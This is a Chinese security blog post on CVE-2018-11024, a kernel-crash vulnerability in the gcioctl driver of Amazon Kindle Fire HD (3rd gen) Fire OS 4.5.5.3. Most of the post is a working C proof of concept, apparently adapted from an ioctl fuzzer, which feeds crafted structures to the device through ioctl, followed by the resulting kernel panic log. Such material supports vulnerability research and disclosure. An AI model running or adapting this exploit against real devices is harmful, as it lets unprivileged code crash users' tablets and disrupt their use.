Posted Updated Updated IOT19 minutes read (About 2863 words)0 visits

(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞

一、漏洞简介

Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3的内核组件中的内核模块/omap/drivers/misc/gcx/gcioctl/gcif.c允许攻击者通过设备/ dev上ioctl的参数注入特制参数/ gcioctl使用命令1077435789并导致内核崩溃。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

#include<stdio.h>
#include<string.h>	  //strlen
#include<sys/socket.h>
#include<arpa/inet.h> //inet_addr
#include<unistd.h>	  //write
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdbool.h>

// Socket boilerplate code taken from here: http://www.binarytides.com/server-client-example-c-sockets-linux/

/*
 seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blobs
*/
int debug = 1;

typedef struct {
	int src_id;
	int dst_id;
	int offset;
} map_entry_t;

short tiny_vals[18] = {128, 127, 64, 63, 32, 31, 16, 15, 8, 7, 4, 3, 2, 1, 0, 256, 255, -1};
int *small_vals;
int num_small_vals;

// populates small_vals when called
void populate_arrs(int top) {
	int num = 1;
	int count = 0;
	while (num < top) {
		//printf("%d\n", num);
		num <<= 1;
		count += 2;
	}
	// top
	count += 1;
	// -1
	count += 1;
	num_small_vals = count;
	num >>= 1;

	small_vals = malloc(sizeof(int)*count);
	memset(small_vals, 0, count);

	int i = 0;
	while(num > 1) {
		small_vals[i] = num;
		i++;
		small_vals[i] = num-1;
		i++;
		num >>= 1;
	}
	small_vals[i] = 0;
	small_vals[i+1] = top;
	small_vals[i+2] = top-1;
	small_vals[i+3] = -1;
}

// generate a random value of size size and store it in elem.
// value has a weight % chance to be a "small value"
void gen_rand_val(int size, char *elem,  int small_weight) {
	int i;

	if ((rand() % 100) < small_weight) {
		// do small thing
		unsigned int idx = (rand() % num_small_vals);
		printf("Choosing %d\n", small_vals[idx]);
		switch (size) {
			case 2:
				idx = (rand() % 18);
				*(short *)elem = tiny_vals[idx];
				break;
			case 4:
				*(int *)elem = small_vals[idx];
				break;

			case 8:
				*(long long*)elem = small_vals[idx];
				break;

			default:
				printf("Damn bro. Size: %d\n", size);
				exit(-1);
		}
	}

	else {

		for(i=0; i < size; i++) {
			elem[i] = (char)(rand()%0x100);
		}
	}

}
 
int main(int argc , char *argv[])
{
	int num_blobs = 0, num_mappings = 0, i = 0, dev_name_len = 0, j;
	unsigned int ioctl_id = 0;
	char *dev_name;
	void *tmp;
	char **ptr_arr;
	int *len_arr;
	unsigned int seed;

	int sockfd , client_sock , c , read_size;
	struct sockaddr_in server , client;
	int msg_size;
	void *generic_arr[264];

	// max val for small_vals array
	int top = 8192;
	int cnt = 0;
	// chance that our generics are filled with "small vals"
	int default_weight = 50;
	populate_arrs(top);
	int retest = 1;
	goto rerun;
	


	sockfd = socket(AF_INET , SOCK_STREAM , 0);
	if (sockfd == -1)
	{
		printf("Could not create socket");
	}
	puts("Socket created");

	setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
	 
	server.sin_family = AF_INET;
	server.sin_addr.s_addr = INADDR_ANY;
	server.sin_port = htons(atoi(argv[1]));

	//Bind
	if( bind(sockfd,(struct sockaddr *)&server , sizeof(server)) < 0)
	{
		//print the error message
		perror("bind failed. Error");
		return 1;
	}
	puts("bind done");
listen:	 
	// Listen
	listen(sockfd , 3);
	 
	puts("Waiting for incoming connections...");
	c = sizeof(struct sockaddr_in);
	 
	// accept connection from an incoming client
	client_sock = accept(sockfd, (struct sockaddr *)&client, (socklen_t*)&c);
	if (client_sock < 0)
	{
		perror("accept failed");
		return 1;
	}
	puts("Connection accepted");
	 
	msg_size = 0;
	// Receive a message from client
	while( (read_size = recv(client_sock , &msg_size , 4 , 0)) > 0 )
	{
		// recv the entire message
		char *recv_buf = calloc(msg_size, sizeof(char));
		if (recv_buf == NULL) {
			printf("Failed to allocate recv_buf\n");
			exit(-1);
		}

		int nrecvd = recv(client_sock, recv_buf, msg_size, 0);
		if (nrecvd != msg_size) {
			printf("Error getting all data!\n");
			printf("nrecvd: %d\nmsg_size:%d\n", nrecvd, msg_size);
			exit(-1);
		}
		// quickly save a copy of the most recent data
		int savefd = open("/sdcard/saved", O_WRONLY|O_TRUNC|O_CREAT, 0644);
		if (savefd < 0) {
			perror("open saved");
			exit(-1);
		}

		int err = write(savefd, recv_buf, msg_size);
		if (err != msg_size) {
			perror("write saved");
			exit(-1);
		}
		fsync(savefd);
		close(savefd);
rerun:
		if (retest) {
			recv_buf = calloc(msg_size, sizeof(char));
			int fd = open("/sdcard/saved", O_RDONLY);
			if (fd < 0) {
				perror("open:");
				exit(-1);
			}
			int fsize = lseek(fd, 0, SEEK_END);
			printf("file size: %d\n", fsize);
			lseek(fd, 0, SEEK_SET);
			read(fd, recv_buf, fsize);
		}

		char *head = recv_buf;
		seed = 0;
		//seed, ioctl_id, num_mappings, num_blobs, dev_name_len, dev_name, map_entry_t_arr, blob_len_arr, blobs
		memcpy(&seed, head, 4);
		head += 4;
		memcpy(&ioctl_id, head, 4);
		head += 4;
		memcpy(&num_mappings, head, 4);
		head += 4;
		memcpy(&num_blobs, head, 4);
		head += 4;
		memcpy(&dev_name_len, head, 4);
		head += 4;
		
		// srand with new seed
		srand(seed);

		/* dev name */
		dev_name = calloc(dev_name_len+1, sizeof(char));
		if (dev_name == NULL) {
			printf("Failed to allocate dev_name\n");
			exit(-1);
		}
		memcpy(dev_name, head, dev_name_len);
		head += dev_name_len;

		/* map */
		map_entry_t *map = calloc(num_mappings, sizeof(map_entry_t));
		if (map == NULL) {
			printf("Failed to allocate map\n");
			exit(-1);
		}

		if (num_mappings != 0) {
			memcpy(map, head, num_mappings*sizeof(map_entry_t));
			head += num_mappings*sizeof(map_entry_t);
		}

		/* blobs */
		
		// first create an array to store the sizes themselves
		len_arr = calloc(num_blobs, sizeof(int));
		if (len_arr == NULL) {
			printf("Failed to allocate len_arr\n");
			exit(-1);
		}

		// we'll also want an array to store our pointers
		ptr_arr = calloc(num_blobs, sizeof(void *));
		if (ptr_arr == NULL) {
			printf("Failed to allocate ptr_arr\n");
			exit(-1);
		}


		// copy the blob sizes into our size_arr
		for (j=0; j < num_blobs; j++) {
			memcpy(&len_arr[j], head, sizeof(int));
			head += sizeof(int);
		}

		// we'll also want memory bufs for all blobs
		// now that we have the sizes, allocate all the buffers we need
		for (j=0; j < num_blobs; j++) {
			ptr_arr[j] = calloc(len_arr[j], sizeof(char));
            printf("Sizeof(ptr_arr[%d])=%d\n", j, len_arr[j]);
            printf("ptr_arr[%d]=%p\n", j, ptr_arr[j]);

			//printf("just added %p to ptr_arr\n", ptr_arr[j]);
			if (ptr_arr[j] == NULL) {
				printf("Failed to allocate a blob store\n");
				exit(-1);
			}

			// might as well copy the memory over as soon as we allocate the space
			memcpy((char *)ptr_arr[j], head, len_arr[j]);
            printf("ptr_arr[%d]=\n", j);
            for(i=0;i<len_arr[j];i+=4){
                printf("0x%08x\n", *(unsigned int *)(ptr_arr[j] + i));
            }
            printf("\n");

			head += len_arr[j];
		}
		
		int num_generics = 0;

		// time for pointer fixup
		for (i=0; i < num_mappings; i++) {
			// get out entry
			map_entry_t entry = map[i];
			// pull out the struct to be fixed up
			char *tmp = ptr_arr[entry.src_id];
		
			// check if this is a struct ptr or just a generic one
			
			// just a generic one
			if (entry.dst_id < 0) {
				// 90% chance we fixup the generic
				if ( (rand() % 10) > 0) {
					int buf_len = 128;
					char *tmp_generic = malloc(buf_len);
					memset(tmp_generic, 0, buf_len);
					// 95% chance we fill it with data
					if ((rand() % 100) > 95) {
						// if dst_id is < 0, it's abs value is the element size
						int size = -1 * entry.dst_id;
						int weight;
						// if it's a char or some float, never choose a "small val"
						if (size == 1 || size > 8)
							weight = 0;
						else
							weight = default_weight;

						for (i=0; i < buf_len; i+=size) {
							gen_rand_val(size, &tmp_generic[i], weight);
						}
					}
					generic_arr[num_generics] = tmp_generic;
					memcpy(tmp+entry.offset, &tmp_generic, sizeof(void *));
					num_generics += 1;
					if (num_generics >= 264) {
						printf("Code a better solution for storing generics\n");
						exit(1);
					}
				}
			}

			// a struct ptr, so we have the data
			else {
				// 1 in 400 chance we don't fixup
				if ( (rand() % 400) > 0) {
					// now point it to the correct struct/blob
					// printf("placing %p, at %p\n", ptr_arr[entry.dst_id], tmp+entry.offset);
					memcpy(tmp+entry.offset, &ptr_arr[entry.dst_id], sizeof(void *));
				}
			}
		}
		
		if (debug) {
			printf("ioctl_id: %d\n", ioctl_id);
			printf("num_mappings: %d\n", num_mappings);
			printf("num_blobs: %d\n", num_blobs);
			printf("dev_name_len: %d\n", dev_name_len);
			printf("dev_name: %s\n", dev_name);
			printf("data[]: \n");
            //printf("(0x%x)\n", *(int *)&ptr_arr[0]);
            printf("(0x%p) : ", &ptr_arr[0]);
            printf("(0x%016lx)\n", *(unsigned long int *)ptr_arr[0]);
            printf("(0x%p) : ", (&ptr_arr[0]+1*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+1*8));

            printf("(0x%p) : ", (&ptr_arr[0]+2*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+2*8));

            printf("(0x%p) : ", (&ptr_arr[0]+3*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+3*8));

            printf("(0x%p) : ", (&ptr_arr[0]+4*8));
            printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+4*8));

            //printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+5*8));
            //printf("(0x%016lx)\n", *(unsigned long int *)(ptr_arr[0]+6*8));

            //printf("(0x%x)\n", (int *)ptr_arr, (int *)ptr_arr);
            
		}
		
		// time for the actual ioctl
		//printf("Try to open device %s\n", dev_name);
		//fflush(stdout);
		int fd = open(dev_name, O_RDONLY);
		if (fd < 0) {
			perror("open");
			exit(-1);
		} else {
		    printf("Open devicd %s successfully.\n", dev_name);
		}

		//fflush(stdout);
		//printf("Try to call ioctl(fd=%d, ioctl_id=%d, ptr_arr=%p)\n", fd, ioctl_id, ptr_arr[0]);
		fflush(stdout);
		printf("%10d:", cnt++);
		if ((ioctl(fd, ioctl_id, ptr_arr[0])) == -1)
			perror("ioctl");
		
		else
			printf("good hit\n");
		close(fd);
		printf("device %s closed\n", dev_name);

		if (retest)
			exit(0);

		fflush(stdout);
		// okay now free all the shit we alloced
		free(recv_buf);
		free(dev_name);
		if (map != NULL)
			free(map);
		free(len_arr);
		for (i=0; i < num_blobs; i++) {
			//printf("%d: free'ing %p\n", i, ptr_arr[i]);
			free(ptr_arr[i]);
		}
		free(ptr_arr);
		for (i=0; i < num_generics; i++) {
			free(generic_arr[i]);
		}
		
		write(client_sock, &msg_size, 4);

		msg_size = 0;
	}
	 
	if(read_size == 0)
	{
		puts("Client disconnected");
		fflush(stdout);
		close(client_sock);
		goto listen;
	}
	else if(read_size == -1)
	{
		perror("recv failed");
	}
	 
	return 0;
}

崩溃日志

[  144.428375] Unable to handle kernel paging request at virtual address d900000c
[  144.436462] pgd = dcac0000
[  144.439697] [d900000c] *pgd=00000000
[  144.443939] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[  144.450012] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[  144.457672] CPU: 0    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[  144.465118] PC is at c2dm_l1cache+0x30/0x100
[  144.469940] LR is at dev_ioctl+0x3f0/0x10c4
[  144.474670] pc : [<c03187ac>]    lr : [<c031782c>]    psr: a0000013
[  144.474670] sp : c2d6be38  ip : 00000000  fp : c2d6be6c
[  144.487640] r10: 00000000  r9 : d8c0cca8  r8 : 00b8dd90
[  144.493621] r7 : 00000000  r6 : c2d6bea4  r5 : 00b8dd90  r4 : 388b77c4
[  144.500915] r3 : d9000004  r2 : 75e0c121  r1 : c2d6bea4  r0 : 00000000
[  144.508331] Flags: NzCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[  144.516418] Control: 10c5387d  Table: 9cac004a  DAC: 00000015
[  144.522827] 
[  144.522857] PC: 0xc031872c:
[  144.527954] 872c  e51b2034 e592300c eaffffa5 e30c281c e34c209d e5923000 e3530000 1affffbd
[  144.538482] 874c  eaffffc0 e51b303c e51b1040 e2833001 e51b2034 e1530001 e50b303c e2822010
[  144.549163] 876c  e50b2034 1affff8c eaffff83 c09dc81c e1a0c00d e92ddff0 e24cb004 e24dd00c
[  144.559844] 878c  e3500000 e1a07002 e50b0030 da00000d e0814200 e1a06001 e1a03001 e3a02000
[  144.570404] 87ac  e5930008 e593c004 e2833010 e1530004 e022209c 1afffff9 e3520902 3a000003
[  144.581085] 87cc  e3570002 9a000022 e24bd028 e89daff0 e59f9090 e2818008 e3a0a000 e5963008
[  144.591735] 87ec  e5184008 e3530000 13a05000 1a00000a ea000010 e5181004 e5993024 e0841001
[  144.602416] 880c  e12fff33 e5962008 e2855001 e596300c e1550002 e0844003 2a000006 e2572000
[  144.612976] 
[  144.612976] LR: 0xc03177ac:
[  144.618072] 77ac  ebf55c15 eaffff35 e3053d8d e3443038 e1510003 1affff30 e1a0200d e3c23d7f
[  144.628631] 77cc  e3c3303f e24b0064 e5933008 e2952038 30d22003 33a03000 e3530000 1a0001a8
[  144.639160] 77ec  e1a01005 e3a02038 ebfcfa90 e3500000 1a00000e e51b2030 e3520001 0a0001cb
[  144.649780] 780c  e3520002 0a0001ee e3520000 1a000007 e51b0064 e3a02000 e24b1060 eb0003d3
[  144.660369] 782c  e51b0064 e24b1060 e51b2030 eb000338 e3a05000 eaffff11 e24b1064 e50b1088
[  144.670776] 784c  e51b0088 e3a01010 ebfd03c1 e3a03004 e50b3064 e5963008 e2952004 30d22003
[  144.681213] 786c  33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f e3c6603f
[  144.691528] 788c  e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064 e1a01005
[  144.701995] 
[  144.701995] SP: 0xc2d6bdb8:
[  144.706878] bdb8  c2d6be24 00b8dd90 c2d6bdec c2d6bdd0 c00084d0 c03187ac a0000013 ffffffff
[  144.717407] bdd8  c2d6be24 00b8dd90 c2d6be6c c2d6bdf0 c06a5318 c0008370 00000000 c2d6bea4
[  144.727905] bdf8  75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4 00000000 00b8dd90 d8c0cca8
[  144.738586] be18  00000000 c2d6be6c 00000000 c2d6be38 c031782c c03187ac a0000013 ffffffff
[  144.749145] be38  c02ba53c 575b4b92 d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90
[  144.759796] be58  d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088
[  144.770355] be78  000ffeff 00000001 c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000
[  144.781005] be98  c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261
[  144.791687] 
[  144.791687] FP: 0xc2d6bdec:
[  144.796661] bdec  c0008370 00000000 c2d6bea4 75e0c121 d9000004 388b77c4 00b8dd90 c2d6bea4
[  144.807189] be0c  00000000 00b8dd90 d8c0cca8 00000000 c2d6be6c 00000000 c2d6be38 c031782c
[  144.817840] be2c  c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000 00000000 00b8dd90
[  144.828399] be4c  0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04 c2d6be70 c031782c
[  144.839080] be6c  c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc c2d6be90 c0207454
[  144.849761] be8c  c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92 4ccba3b5 47a0578f
[  144.860290] beac  83b275c7 00000000 00020261 00000000 00000000 00000000 00000000 00000000
[  144.870971] becc  00000000 00000000 00000000 c02089fc 00000000 dcae46c0 0000000b dcae46c0
[  144.881652] 
[  144.881652] R1: 0xc2d6be24:
[  144.886627] be24  c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[  144.897308] be44  00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[  144.907989] be64  c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[  144.918518] be84  c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[  144.929199] bea4  4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[  144.939849] bec4  00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[  144.950531] bee4  0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[  144.961059] bf04  c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[  144.971710] 
[  144.971710] R3: 0xd8ffff84:
[  144.976623] ff84  d8ffff20 d8efb000 00000707 020e40fb d8efb075 d8ffff3c d8efb01c d8ffffa0
[  144.987213] ffa4  d8ffffa0 d8efb028 ca9788f0 d8ffffb0 d8ffffb0 00000000 bf06e9c8 80000088
[  144.997772] ffc4  dd2eac00 dd309540 00000000 00000000 00000000 00000000 00000000 00000000
[  145.008392] ffe4  00000000 00000000 00000000 00000000 00000000 00000000 00000000 ********
[  145.018798] 0004  ******** ******** ******** ******** ******** ******** ******** ********
[  145.029327] 0024  ******** ******** ******** ******** ******** ******** ******** ********
[  145.039886] 0044  ******** ******** ******** ******** ******** ******** ******** ********
[  145.050384] 0064  ******** ******** ******** ******** ******** ******** ******** ********
[  145.060913] 
[  145.060913] R6: 0xc2d6be24:
[  145.066009] be24  c2d6be38 c031782c c03187ac a0000013 ffffffff c02ba53c 575b4b92 d8578000
[  145.076568] be44  00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf04
[  145.087219] be64  c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001 c2d6bedc
[  145.097900] be84  c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8 575b4b92
[  145.108459] bea4  4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000 00000000
[  145.118988] bec4  00000000 00000000 00000000 00000000 00000000 c02089fc 00000000 dcae46c0
[  145.129638] bee4  0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08 c0136044
[  145.140319] bf04  c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[  145.150848] 
[  145.150848] R9: 0xd8c0cc28:
[  145.155944] cc28  d8c0cc28 d8c0cc28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[  145.166503] cc48  00000000 00000000 d8c0cc50 d8c0cc50 00000000 c0aa5174 c0aa5174 c0aa5148
[  145.177062] cc68  5aefd94b 00000000 00000000 00000000 d8c0cc80 9ad1f453 00000000 00000000
[  145.187713] cc88  00200000 00000000 00000000 d8c0cc94 d8c0cc94 dd3b56c0 dd3b56c0 00000000
[  145.198394] cca8  000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[  145.208923] ccc8  d8c0cd80 dd3e3e70 00001064 00000001 0fb00000 5aefd94b 2d2b4d13 5aefd94b
[  145.219573] cce8  2d2b4d13 5aefd94b 2d2b4d13 00000000 00000000 00000000 00000000 00000000
[  145.230255] cd08  00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0cd24
[  145.240936] Process executor32 (pid: 3810, stack limit = 0xc2d6a2f8)
[  145.248016] Stack: (0xc2d6be38 to 0xc2d6c000)
[  145.253082] be20:                                                       c02ba53c 575b4b92
[  145.262176] be40: d8578000 00000000 00b8dd90 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000
[  145.271392] be60: c2d6bf04 c2d6be70 c031782c c0318788 00000001 00000088 000ffeff 00000001
[  145.280609] be80: c2d6bedc c2d6be90 c0207454 c00bd920 00000027 d7ce5000 c2d6bed4 c2d6bea8
[  145.289703] bea0: 575b4b92 4ccba3b5 47a0578f 83b275c7 00000000 00020261 00000000 00000000
[  145.298919] bec0: 00000000 00000000 00000000 00000000 00000000 00000000 c02089fc 00000000
[  145.308105] bee0: dcae46c0 0000000b dcae46c0 00b8dd90 d8c0cca8 00000000 c2d6bf74 c2d6bf08
[  145.317352] bf00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[  145.326416] bf20: dcf8c440 c2d6bf0c c2d6a000 00b8dd80 00b8dd90 40385d8d dcae46c0 0000000b
[  145.335662] bf40: c2d6a000 00000000 c2d6bf64 00000000 00b8dd90 40385d8d dcae46c0 0000000b
[  145.344879] bf60: c2d6a000 00000000 c2d6bfa4 c2d6bf78 c01365e0 c0135fc4 00000000 00000000
[  145.354095] bf80: c0013e08 00b8dd80 000121c0 00000000 00000036 c0013e08 00000000 c2d6bfa8
[  145.363159] bfa0: c0013c60 c0136578 00b8dd80 000121c0 0000000b 40385d8d 00b8dd90 00b8dd90
[  145.372406] bfc0: 00b8dd80 000121c0 00000000 00000036 00000000 00000000 00000000 bee035f4
[  145.381622] bfe0: 810100fc bee030f4 00011578 0002b28c 60000010 0000000b 4d6969d9 03020430
[  145.390686] Backtrace: 
[  145.393829] [<c031877c>] (c2dm_l1cache+0x0/0x100) from [<c031782c>] (dev_ioctl+0x3f0/0x10c4)
[  145.403228] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[  145.412658] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[  145.421874] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[  145.431304]  r8:c0013e08 r7:00000036 r6:00000000 r5:000121c0 r4:00b8dd80
[  145.439605] Code: e0814200 e1a06001 e1a03001 e3a02000 (e5930008) 
[  145.450225] Board Information: 
[  145.450225]  Revision : 0001
[  145.450256]  Serial	: 0000000000000000
[  145.450256] SoC Information:
[  145.450256]  CPU	: OMAP4470
[  145.450286]  Rev	: ES1.0
[  145.450286]  Type	: HS
[  145.450286]  Production ID: 0002B975-000000CC
[  145.450286]  Die ID	: 1CC60000-50002FFF-0B00935D-11007004
[  145.450317] 
[  145.485900] ---[ end trace 0fe3b4c74b4e9fa7 ]---
[  145.491149] Kernel panic - not syncing: Fatal exception
[  145.496917] CPU1: stopping
[  145.500152] Backtrace: 
[  145.503204] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[  145.512695]  r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[  145.519714] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[  145.528961] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[  145.538482] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[  145.547637] Exception stack(0xd85a5fb0 to 0xd85a5ff8)
[  145.553466] 5fa0:                                     41822290 418185e8 00000001 41c95000
[  145.562561] 5fc0: 418185e8 41687460 4010d0ec 418185e8 4010d038 41689398 7fffffff 401602ec
[  145.571777] 5fe0: 418191e8 5ba34d10 41609aa8 41609974 200b0010 ffffffff
[  145.579284]  r6:ffffffff r5:200b0010 r4:41609974 r3:41822290
[  145.586364] CPU0 PC (0) : 0xc003ee38
[  145.590576] CPU0 PC (1) : 0xc003ee54
[  145.594635] CPU0 PC (2) : 0xc003ee54
[  145.598693] CPU0 PC (3) : 0xc003ee54
[  145.602722] CPU0 PC (4) : 0xc003ee54
[  145.606781] CPU0 PC (5) : 0xc003ee54
[  145.610839] CPU0 PC (6) : 0xc003ee54
[  145.614898] CPU0 PC (7) : 0xc003ee54
[  145.619110] CPU0 PC (8) : 0xc003ee54
[  145.623168] CPU0 PC (9) : 0xc003ee54
[  145.627227] CPU1 PC (0) : 0xc0019b2c
[  145.631408] CPU1 PC (1) : 0xc0019b2c
[  145.635467] CPU1 PC (2) : 0xc0019b2c
[  145.639495] CPU1 PC (3) : 0xc0019b2c
[  145.643707] CPU1 PC (4) : 0xc0019b2c
[  145.647766] CPU1 PC (5) : 0xc0019b2c
[  145.651824] CPU1 PC (6) : 0xc0019b2c
[  145.656005] CPU1 PC (7) : 0xc0019b2c
[  145.660064] CPU1 PC (8) : 0xc0019b2c
[  145.664123] CPU1 PC (9) : 0xc0019b2c
[  145.668182] 
[  145.669952] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[  145.669982]

(CVE-2018-11024)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞

http://www.ol4three.com/2020/09/12/IOT/Exploit/Amazon%20Kindle%20Fire%20HD(3rd)/%EF%BC%88CVE-2018-11024%EF%BC%89Amazon-Kindle-Fire-HD-3rd-Fire-OS-kernel%E7%BB%84%E4%BB%B6%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E/

Author

ol4three

Posted on

2020-09-12

Updated on

2021-03-03

Licensed under

 

Like this article? Support the author with

Comments

Follow

Catalogue

Links

Categories

Recents

Tags

3601
APP测试1
AWD1
ActiveMQ2
Amazon7
Apache2
Apache-Cocoon-XML1
Apereo Cas1
AppWeb1
Apple T21
BLE2
BadUsb1
C24
CAN1
CTF1
Car1
Cisco2
Cobalt Strike4
Code_audit2
DLL劫持1
DMA1
Dict1
Drozer1
EDR2
Exchange-Server1
Frida5
Glibc Heap1
Google-Hacking1
HTTP请求走私协议1
HWS1
Hook5
Horde Groupware Webmail Edition1
Httpdecrypt1
Huawei1
IOT17
JCG1
MCA1
MCE1
MSF1
Mybatis1
Mysql-python1
NC1
OSS1
PHP反序列化1
PHP网站1
PWN4
PhpStudy1
PineApple-Nano1
Pligg1
PowerSploit1
ProcessPoolExecutor1
Pwn2
Python1
RCE1
SDK1
SGX1
SQLI-labs1
SQL注入1
SSTI1
Smartbi1
Spring Boot1
Sql注入1
Thunderbolt 31
UAF2
Ubertooth one1
VIM1
VPN1
WEB安全2
XiaoMi2
ZTE1
adb1
codeql1
crackme5
crunch1
icarus1
iot1
java反序列化4
junior1
kindeditor1
multiprocessing1
nginx解析漏洞1
objection2
pwnable.kr1
queue1
sangfor4
scrcpy1
sql注入1
struts21
unlink1
三星1
云存储1
代理转发1
内网渗透2
协议分析1
后渗透1
固件1
1
天融信2
宏病毒1
宝塔1
小程序1
未授权访问漏洞1
格式化字符串1
正则1
泛微OA1
用友1
红队百科全书1
绿盟1
蓝牙1
路由器1
通达OA3
面试1
默认密码1
齐治堡垒机1

Subscribe for updates

Advertisement

×